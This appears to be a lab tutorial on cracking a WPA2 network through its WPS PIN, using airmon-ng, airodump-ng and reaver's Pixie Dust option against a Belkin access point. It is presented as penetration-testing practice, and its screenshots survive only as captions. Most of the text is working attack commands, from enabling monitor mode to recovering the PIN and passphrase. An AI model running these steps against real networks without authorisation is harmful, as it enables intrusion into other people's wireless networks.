Lab : Crack WPA2 PSK network With Reaver &

PixieWPS
Scenario

Attacker – Kali Linux(Sana) Machine (not VM)

Target – Belkin AP

Step 1 : Initial Setup

Start monitor interface inorder to start capturing packets from air.

Command: service network-manager stop

Command: airmon-ng check

Kill interfering processes. Do this repeteadly for all processes until airmon-ng check gives
“no interfering” output.

Command: kill -9 <pid>

Start the monitor interface.

Command: airmon-ng check

Command: iwconfig
command: airmon-ng start wlan0 <replace with yours>

Reaver Initial Setup

Reaver Initial Setup

Step 2 : Start Capture & select target.

Airodump dumps the packets received on the monitor interface. We can choose whether
or not to write the packets to a file. A full tutorial on this will be coming in the near future.

command: airodump-ng wlan0mon <replace with yours>

Starting Capture

Executing Airodump actually turns the terminal to an updating terminal which shows all
information. Note the target BSSID, channel & ESSID. Press control+c to stop airodump.

Run reaver with relevant info.

command: reaver -i wlan0mon <replace with yours> -b <bssid> -c

<channel no> -K 1 -vv
Capture & Reaver Output

From the above figure, we can get the MAC of our target. Make a note of this, then run
reaver.
Pixie Output

There you have the passphrase & the PIN. Thus this is a combined Offline – Online attack
which can be run against wireless access points during Wireless Penetration
tests. Interestingly, PixieWPS finds out a lot of other information like the model number
of the AP, manufacturer etc. So during tests, one can use this to search for common-
known vulnerabilities of the specific AP.

For best perfomance of the attack use Alfa Network AWUS036NH or similar model.

Related Video: https://vimeo.com/126489367